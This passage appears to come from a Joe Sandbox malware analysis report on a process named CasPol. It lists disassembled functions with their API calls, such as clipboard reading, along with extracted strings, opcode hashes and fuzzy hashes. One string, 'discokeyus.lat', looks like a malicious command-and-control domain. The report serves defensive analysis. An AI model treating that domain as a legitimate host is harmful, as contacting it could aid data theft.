Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

z/6q, xrefs: 0040903D
wkw6, xrefs: 00409045
|$Nb, xrefs: 00409025
ye{|, xrefs: 00409035
(, xrefs: 00409065
jqci, xrefs: 0040901D
x|j~, xrefs: 0040904D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

", xrefs: 0041F121
-+, xrefs: 0041F11A
/, xrefs: 0041E9BE
hI, xrefs: 0041E98F

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

i, xrefs: 00417B2A
r}A, xrefs: 00417D60
,, xrefs: 004183A1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

i, xrefs: 00417B2A
r}A, xrefs: 00417D60
gfff, xrefs: 00417747

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

C], xrefs: 0041D471
34, xrefs: 0041D46A
|F, xrefs: 0041D40A

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

sWK), xrefs: 0042E049
TQ][, xrefs: 0042E307
Ef, xrefs: 0042E24E

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

+|-~, xrefs: 0041B306
/pqr, xrefs: 0041B30E
_, xrefs: 0041B428

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

discokeyus.lat, xrefs: 0040DF76, 0040E316
Dx, xrefs: 0040E139

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: Dx$discokeyus.lat
API String ID: 0-1480405892
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

i, xrefs: 00417B2A
r}A, xrefs: 00417D60

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418590
P<?, xrefs: 00418680

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 0041682D Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
Opcode Fuzzy Hash: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A

Function 004074F0 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 004197C2 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786

Function 004291DD Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94

Function 00405990 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96

Function 00415220 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A

Function 00426B95 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9

Function 0043F330 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 0043EFB0 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46

Function 00429C2B Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

